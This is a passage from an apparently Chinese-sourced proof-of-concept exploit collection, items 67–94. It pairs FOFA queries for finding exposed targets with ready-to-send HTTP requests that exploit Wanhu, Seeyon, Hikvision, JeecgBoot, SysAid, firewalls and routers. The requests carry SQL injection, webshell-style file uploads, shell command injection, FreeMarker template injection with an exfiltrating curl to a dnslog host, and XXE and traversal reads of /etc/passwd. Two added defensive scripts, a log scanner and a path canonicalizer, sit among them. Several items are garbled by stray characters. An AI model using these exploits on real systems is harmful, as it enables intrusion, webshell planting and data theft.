Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 the UNION SELECT asks the database to compute), the target is vulnerable.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and the multipart filename give the written file's name, dir its directory (relative, so ../ escapes the intended folder), and fileType its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
The ;.js suffix is a Tomcat path parameter: the container still serves wf_printnum.jsp, while a filter keyed on the raw URL sees a .js request.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

" o4 p' o9 ?- N, m9 J) C70. 万户ezEIP success 命令执行, `/ k+ c2 Y# _
FOFA:app="万户网络-ezEIP" g4 Y% F$ t. S# U
POST /member/success.aspx HTTP/1.1% g6 b; }1 @ J" Y0 ^" U
Host: {{Hostname}}
4 H& _9 \( F* Z! V! t2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 {+ C) i; G/ }& _( f3 N4 S) x8 T: CSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
. `& o X; @5 h% F$ s+ c: NContent-Type: application/x-www-form-urlencoded* F; z0 o- D7 Z
TYPE: C& D( l1 p4 U3 V2 R
Content-Length: 167027 ?. k) Q K+ | D5 y
! P5 V) R5 T/ L$ }& d5 {; q
__VIEWSTATE=PAYLOAD
; } B0 w# N0 N6 j }% P- S7 D1 A3 J4 g( g+ T `( z+ [
, V2 s" b! W! l1 a
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
xmlValue is a URL-encoded XML document whose DOCTYPE declares an external entity xxe pointing at file:///c:/windows/win.ini and references it in the VALUE field.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
The time parameter is passed to a shell unquoted, so the backtick-quoted ifconfig runs and its output is redirected into a file under /cgi-bin/.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
The UnitCode field is rendered as a FreeMarker template; the ?new() built-in instantiates freemarker.template.utility.Execute, which runs the given command.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then fetch the file the command wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then confirm the file landed where the target field pointed:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) 天耀 DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
The report parameter is used as the output filename without traversal checks, so ../ places the JSP in the web root.
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the written file:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

/ P" x8 R) Q4 ~5 e; [83. JeecgBoot testConnection 远程命令执行
6 a b- U' w$ j: dFOFA:title=="JeecgBoot 企业级低代码平台"# j( e1 h r9 t5 A, l& ~% P! S0 a' M
" }4 K3 ?: W) m7 r7 k) P6 }
( I/ Z3 S+ E7 N1 E ?4 E/ m
POST /jmreport/testConnection HTTP/1.1: j/ f/ x& G9 R1 E* U$ v) j$ J
Host: x.x.x.x
7 B& l( C/ C. M! ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ d6 ~ D( ~# h5 n2 l, g8 F3 `Connection: close& B" k( @+ n+ m
Content-Length: 8881
. \$ H q5 E& |2 V0 V1 }Accept-Encoding: gzip
; k1 J+ ^$ U6 ~2 }Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
- C- i. _) l( q1 oContent-Type: application/json
, q" N0 |4 G# L: u* y, G; Z3 r$ j/ {
PAYLOAD
4 b. G, Y( Z5 u6 x
84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql field is evaluated as a FreeMarker template before it reaches the database, so the same Execute trick as item 76 runs a command.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
    "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
    "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below drops a Godzilla webshell; accountId traverses out of the intended directory into tomcat/webapps.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
The host field reaches a shell: %0a is a newline that terminates the ping command, and ${IFS} stands in for the space that the filter would otherwise strip.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
The suffix parameter is appended to the storage path unchecked, so /../../../jfhatuwe.php both escapes the upload directory and sets the extension.
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The uploaded file is then reachable at /jfhatuwe.php.

' D9 C5 V! i: n& o9 i. z4 e88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
a3 L! C& T5 I, h0 r7 k, qFOFA:title="明御安全网关"2 G* O |7 Q( L
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.13 u/ g6 N. [5 U3 ~& l& {
Host: x.x.x.xx.x.x.x
X) F, S$ } w: A, y! lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* E* r' O* a. w- h4 u" _7 [7 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ z& L% Z! j4 m9 B9 N4 L8 r* GAccept-Encoding: gzip, deflate
- T* G9 a: q; D+ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. o3 _5 V; x* n% k1 kConnection: close4 n7 I/ c7 \! g- T! l. J
5 V7 N" |2 @. u/ O4 I; q4 \
5 d7 R |5 I" J+ s" u, y1 p
/astdfkhl.php
% A$ z9 P; I' p5 `5 m1 J7 ^" R/ [1 q& f1 Q' g/ n
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
The request path uses %70 for the letter p, so the raw URL ends in .js%70 but the server serves editflow_manager.jsp.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

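Every SQL injection on this page (items 57, 58, 60, 64, 66, 68, 69, 71 and 89) uses one of a handful of SQL Server probes (@@version, hashbytes('MD5', ...), waitfor delay '0:0:5', union select), the command injections (62, 75, 79, 82, 86, 88) lean on ||, |id, backticks, ${IFS} and an encoded newline, and the template injections (76, 84) and the XXE (72) carry distinctive markup. The scanner below is an added example for defenders, not code from the original page: it URL-decodes each request, and base64-decodes the sql parameter of item 60, before matching, so the signatures fire on what the backend sees rather than on the encoded string. The sample log lines are constructed, the signature labels are this example's own, and a hit is a lead for triage, not proof of compromise.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Matched against the *decoded* request line or body. Labels are this example's
# own; the patterns are taken from the PoCs catalogued on this page.
SIGNATURES = [
    ("sqli-version-probe", re.compile(r"@@version", re.I)),
    ("sqli-hash-probe", re.compile(r"hashbytes\s*\(\s*'md5'", re.I)),
    ("sqli-time-based", re.compile(r"waitfor\s+delay\s+'[\d:]+'", re.I)),
    ("sqli-union-probe", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("sqli-select-function-probe",
     re.compile(r"\bselect\b.*?\b(?:user|version|database)\s*\(\)", re.I)),
    # '||', '|id', `...` and ${IFS}: the shell metacharacters of items 62/75/79/82/86
    ("cmdi-shell-meta", re.compile(r"\|\||\|\s*id\b|`[^`]+`|\$\{IFS\}")),
    ("ssti-freemarker", re.compile(r"<#assign\b.*?\?new\(\)", re.S)),
    ("xxe-external-entity", re.compile(r"<!ENTITY\s+\w+\s+SYSTEM\b", re.I)),
]
# Checked on the *raw* text: an encoded newline (items 86 and 88) only means
# something before decoding, and a legitimately multi-line body must not trip it.
ENCODED_NEWLINE = re.compile(r"%0[aAdD]")
# Parameters whose value is base64-decoded before matching (item 60 uses 'sql';
# 'cmd' and 'data' are added as common names, an assumption of this example).
B64_PARAM = re.compile(r"(?:^|[?&])(?:sql|cmd|data)=([A-Za-z0-9+/]{8,}={0,2})")
# The request line inside a combined-format (Apache/nginx) log entry.
REQ_LINE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP/\d\.\d"')


def decode_layers(text, rounds=3):
    """URL-decode until the text stops changing (bounded, so nested encoding cannot loop)."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def expand_base64_params(raw):
    """Decoded values of base64-carrying parameters found in the raw text."""
    out = []
    for value in B64_PARAM.findall(raw):
        try:
            out.append(base64.b64decode(value, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return out


def scan(raw):
    """Sorted labels of every signature that fires on one request line or body."""
    views = [raw] + expand_base64_params(raw)
    decoded = " ".join(decode_layers(view) for view in views)
    labels = {label for label, pattern in SIGNATURES if pattern.search(decoded)}
    if ENCODED_NEWLINE.search(raw):
        labels.add("cmdi-encoded-newline")
    return sorted(labels)


def scan_log(lines):
    """(line number, labels) for every log entry whose request target matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQ_LINE.search(line)
        labels = scan(match.group(1) if match else line)
        if labels:
            hits.append((number, labels))
    return hits


# Constructed access-log entries reproducing the request lines of items 57, 60,
# 68 and 79 plus one benign request; these are not captured data.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:07:41:00 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 500 312',
    '10.0.0.5 - - [05/Jun/2024:07:41:03 +0800] "GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1" 200 1024',
    '10.0.0.6 - - [05/Jun/2024:07:42:10 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 12',
    '10.0.0.7 - - [05/Jun/2024:07:43:00 +0800] "GET /goform/webRead/open/?path=|id HTTP/1.1" 200 40',
    '10.0.0.8 - - [05/Jun/2024:07:44:00 +0800] "GET /index.jsp HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for number, labels in scan_log(SAMPLE_LOG):
        print(number, ", ".join(labels))
```

Run scan() on POST bodies as well as request lines: the SOAP body of item 64, the JSON of item 84 and the form body of item 89 all match once decoded, and because matching happens after decoding, the ;.js suffix of item 68 or the %27 quoting of item 71 does not hide the probe. Time-based injections that return quickly in the log (items 64, 68, 69, 71) are the ones to cross-check against response times, since a five-second delay on a single request is the actual confirmation.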
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
The body decodes to jsondata[type]=99&jsondata[ip]=ipconfig; the ip field is handed to a shell unsanitized.
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
The ..;/ segment is a Tomcat path-parameter trick: the front-end filter matches /center/api/task/, but the container normalizes the path to /center/api/orgManage/v1/orgs/download, and fileName then traverses to /etc/passwd.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

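The file-read and upload requests above (items 61, 63, 67, 80, 85, 87, 89 and 91) all depend on the backend resolving a path differently from the way a filter sees it: %2F and %70 decode to / and p, ..;/ and .jsp;.js hide behind Tomcat-style path parameters, and ../ climbs out of the directory a parameter was meant to stay in. The canonicalizer below is an added example, not code from the original page: it resolves a request target the way a servlet container or PHP front end will, reports when the path or any query parameter escapes its base, and flags targets that end up on an executable extension. The set of script extensions and the decision to decode twice are this example's assumptions.

```python
import posixpath
from urllib.parse import parse_qsl, unquote

# Extensions the backends on this page execute; a request that resolves to one
# of these after decoding deserves a second look even if the raw URL ended in .js.
SCRIPT_EXT = {".jsp", ".jspx", ".php", ".aspx", ".ashx", ".asmx", ".cgi"}


def resolve(raw):
    """Resolve a path the way a servlet container or PHP front end does.

    Returns (effective_path, escaped_root, had_path_params). Percent-encoding is
    decoded twice (to expose double encoding), ';...' path parameters are stripped
    from every segment (so '..;/' traverses and 'x.jsp;.js' is x.jsp), and '.' and
    '..' segments are collapsed. escaped_root is True when '..' tried to climb
    above the first segment, i.e. a value used as a relative path leaves the
    directory it was meant to stay in.
    """
    decoded = unquote(unquote(raw))
    stack, escaped, had_params = [], False, False
    for segment in decoded.split("/"):
        if ";" in segment:
            had_params = True
            segment = segment.split(";", 1)[0]
        if segment in ("", "."):
            continue
        if segment == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
            continue
        stack.append(segment)
    return "/" + "/".join(stack), escaped, had_params


def analyze(target):
    """Summarize what a request target does once canonicalized.

    traversal_params lists (name, decoded value, resolved value) for every query
    parameter whose value climbs above its own base directory.
    """
    path, _, query = target.partition("?")
    effective, escaped, had_params = resolve(path)
    traversal = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        resolved, value_escaped, _ = resolve(value)
        if value_escaped:
            traversal.append((name, value, resolved))
    return {
        "effective_path": effective,
        "path_escapes_root": escaped,
        "path_param_stripped": had_params,
        "script_ext": posixpath.splitext(effective)[1].lower() in SCRIPT_EXT,
        "traversal_params": traversal,
    }


if __name__ == "__main__":
    # Request targets taken from items 91, 89, 68, 63 and 87 above.
    for target in (
        "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd",
        "/sysform/003/editflow_manager.js%70",
        "/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1",
        "/ipg/appr/MApplyList/downloadFile_client/getdatarecord?path=..%2Fconfig.ini&filename=1&action=download",
        "/webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php",
    ):
        print(target, "->", analyze(target))
```

The same function is the right shape for the server-side fix: resolve the user-supplied name against the intended base directory, then refuse the request unless the result still starts with that base. Checking the raw string for "../" is exactly what the %2F, ..;/ and double-encoding variants on this page are built to slip past.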
92. Hikvision (海康威视) operations management center (运行管理中心) session command execution
Fastjson deserialization leading to command execution.
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin (奇安信) NetGod (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then confirm the upload (note the path is spelled attachements on the device):

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin Wangshen (网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
